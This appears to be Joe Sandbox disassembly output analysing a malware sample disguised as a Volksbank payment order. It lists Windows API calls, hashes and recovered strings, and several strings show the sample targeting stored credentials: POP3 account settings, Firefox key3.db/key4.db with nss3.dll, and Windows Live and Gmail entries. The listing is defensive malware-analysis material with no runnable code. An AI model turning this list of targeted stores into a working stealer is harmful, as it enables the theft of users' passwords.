                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$Item$Rect$ClientFocusPoints
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2432066023-0
                                                                                                                                                                                                                                          • Opcode ID: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
                                                                                                                                                                                                                                          • Instruction ID: 6786727c0aa7fef6bca0c81d499308ec00879f235530f9e7c86c655f771e1d73
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B801A571500305EFDB116F76DC8AF6BBFACEF81755F05442AB4049B191CBB8E8018A28
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040FA1E
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                                                                                                                                                                          • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                                                                                                                                          • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                                                                                                                                          • API String ID: 945165440-3589380929
                                                                                                                                                                                                                                          • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                                                                                                                                          • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                                                                                            • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                                                                                            • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                                                                                                            • Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                                                                                                                                                                          • strchr.MSVCRT ref: 0040371F
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00403778
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040379C
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                                                                                                                                                          • String ID: %s@gmail.com
                                                                                                                                                                                                                                          • API String ID: 3261640601-4097000612
                                                                                                                                                                                                                                          • Opcode ID: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                                                                                                                                                                                                          • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
• Opcode Fuzzy Hash: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
• Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
APIs
• memset.MSVCRT ref: 004094C8
• GetDlgCtrlID.USER32(?), ref: 004094D3
• GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
• memset.MSVCRT ref: 0040950C
• GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
• _strcmpi.MSVCRT ref: 00409531
  • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
• String ID: sysdatetimepick32
• API String ID: 3411445237-4169760276
• Opcode ID: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
• Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
• Opcode Fuzzy Hash: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
• Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
APIs
• GetDlgItem.USER32(?,000003E9), ref: 00405A31
• GetDlgItem.USER32(?,000003E9), ref: 00405A47
• GetDlgItem.USER32(?,000003E9), ref: 00405A5F
• GetDlgItem.USER32(?,000003E9), ref: 00405A7A
• EndDialog.USER32(?,00000002), ref: 00405A96
• EndDialog.USER32(?,00000001), ref: 00405AA9
  • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
  • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
  • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
• SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
• SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
Similarity
• API ID: Item$DialogMessageSend
• String ID:
• API String ID: 2485852401-0
• Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
• Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
• Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
• Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
APIs
• SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
• SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
• LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
• LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
• GetSysColor.USER32(0000000F), ref: 0040B472
• DeleteObject.GDI32(?), ref: 0040B4A6
• DeleteObject.GDI32(00000000), ref: 0040B4A9
• SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
Similarity
• API ID: MessageSend$DeleteImageLoadObject$Color
• String ID:
• API String ID: 3642520215-0
• Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
• Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
• Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
• Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
APIs
• ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405BE9
• ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405C05
• ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C2B
• memset.MSVCRT ref: 00405C3B
• ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C6A
• InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405CB7
• SetFocus.USER32(?,?,?,?), ref: 00405CC0
• ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405CD0
Similarity
• API ID: ??2@$??3@$FocusInvalidateRectmemset
• String ID:
• API String ID: 2313361498-0
• Opcode ID: 20fe0494e672a329d8c574fdcc403b16352a75b97cc0102977cb83616af43d0a
• Instruction ID: 76b7db47255e00c5a16d586f34bfaf53fe76d4163934589152c5d70c184cfcdd
• Opcode Fuzzy Hash: 20fe0494e672a329d8c574fdcc403b16352a75b97cc0102977cb83616af43d0a
• Instruction Fuzzy Hash: AF31B3B1500605AFEB24AF69CC85E2AF7A8FF44354B00853FF55AE76A1D778EC408B94
APIs
• GetClientRect.USER32(?,?), ref: 0040BB33
• GetWindowRect.USER32(?,?), ref: 0040BB49
• GetWindowRect.USER32(?,?), ref: 0040BB5C
• BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
• DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
• DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
• DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
• EndDeferWindowPos.USER32(?), ref: 0040BBE6
Similarity
• API ID: Window$Defer$Rect$BeginClient
• String ID:
• API String ID: 2126104762-0
• Opcode ID: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
• Instruction ID: 10c9609a041f1aae696d54cc03c31aacdb7ad71aa251d7cd9d71944ddb51ea6f
• Opcode Fuzzy Hash: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
• Instruction Fuzzy Hash: 4521C376A00209FFDB518FE8DD89FEEBBB9FB08700F144065FA55A2160C771AA519B24
APIs
• GetSystemMetrics.USER32(00000011), ref: 004072E7
• GetSystemMetrics.USER32(00000010), ref: 004072ED
• GetDC.USER32(00000000), ref: 004072FB
                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                                                                                                                                                          • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                                                                                                                                                          • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1999381814-0
                                                                                                                                                                                                                                          • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                                                                                                          • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                                                                          • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                                                                                                                                          • API String ID: 1297977491-3883738016
                                                                                                                                                                                                                                          • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                                                                                                          • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                                                                                                                                                            • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                                                                                                                                                            • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                                                                            • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                                                                                                                                                            • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                                                                                                                                                            • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$memset
                                                                                                                                                                                                                                          • String ID: gj
                                                                                                                                                                                                                                          • API String ID: 438689982-4203073231
                                                                                                                                                                                                                                          • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                                                                                                          • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DAE3
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DAF7
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                                                            • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                                                                                                                                                            • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                                                                                                                                                            • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpymemset$strlen$_memicmp
                                                                                                                                                                                                                                          • String ID: user_pref("
                                                                                                                                                                                                                                          • API String ID: 765841271-2487180061
                                                                                                                                                                                                                                          • Opcode ID: 9f3536b0c4b6552aef583bc432abc8b8f220ef95764321c1a442fafe8de8c1cc
                                                                                                                                                                                                                                          • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f3536b0c4b6552aef583bc432abc8b8f220ef95764321c1a442fafe8de8c1cc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004058C3
• SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
• SetFocus.USER32(?), ref: 00405976
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: MessageSend$FocusItemmemset
• String ID:
• API String ID: 4281309102-0
• Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
• Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
• Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
• Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
APIs
  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
  • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,76940A60,00000000,?,?,0040A7BE,00000001,0044CBC0,76940A60), ref: 00406D4D
• _mbscat.MSVCRT ref: 0040A8FF
• sprintf.MSVCRT ref: 0040A921
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: FileWrite_mbscatsprintfstrlen
• String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
• API String ID: 1631269929-4153097237
• Opcode ID: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
• Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
• Opcode Fuzzy Hash: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
• Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
APIs
• memset.MSVCRT ref: 0040810E
  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
• LocalFree.KERNEL32(?,?,?,?,?,00000000,7611E430,?), ref: 004081B9
  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
  • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
• String ID: POP3_credentials$POP3_host$POP3_name
• API String ID: 524865279-2190619648
• Opcode ID: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
• Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
• Opcode Fuzzy Hash: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
• Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
APIs
• memset.MSVCRT ref: 00406B8E
• strlen.MSVCRT ref: 00406B99
• strlen.MSVCRT ref: 00406BFF
• strlen.MSVCRT ref: 00406C0D
• strlen.MSVCRT ref: 00406BA7
  • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
  • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: strlen$_mbscat_mbscpymemset
• String ID: key3.db$key4.db
• API String ID: 581844971-3557030128
• Opcode ID: 2f8350c5d3847b8345184316588304a55230d418217e1ade242334758e746451
• Instruction ID: ca97bc5828a50012869c36cbd7bca65918f6b78bc9695587552fe8d314e031cf
• Opcode Fuzzy Hash: 2f8350c5d3847b8345184316588304a55230d418217e1ade242334758e746451
• Instruction Fuzzy Hash: 4B210E3190811D6ADB10AA65DC41ECE77ACDB55318F1104BBF40DF60A1EE38DA958658
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: ItemMenu$CountInfomemsetstrchr
• String ID: 0$6
• API String ID: 2300387033-3849865405
• Opcode ID: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
• Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
• Opcode Fuzzy Hash: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
• Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
APIs
• memset.MSVCRT ref: 004076D7
• sprintf.MSVCRT ref: 00407704
• strlen.MSVCRT ref: 00407710
• memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
• strlen.MSVCRT ref: 00407733
• memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
Strings
Memory Dump Source
• Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
Similarity
• API ID: memcpystrlen$memsetsprintf
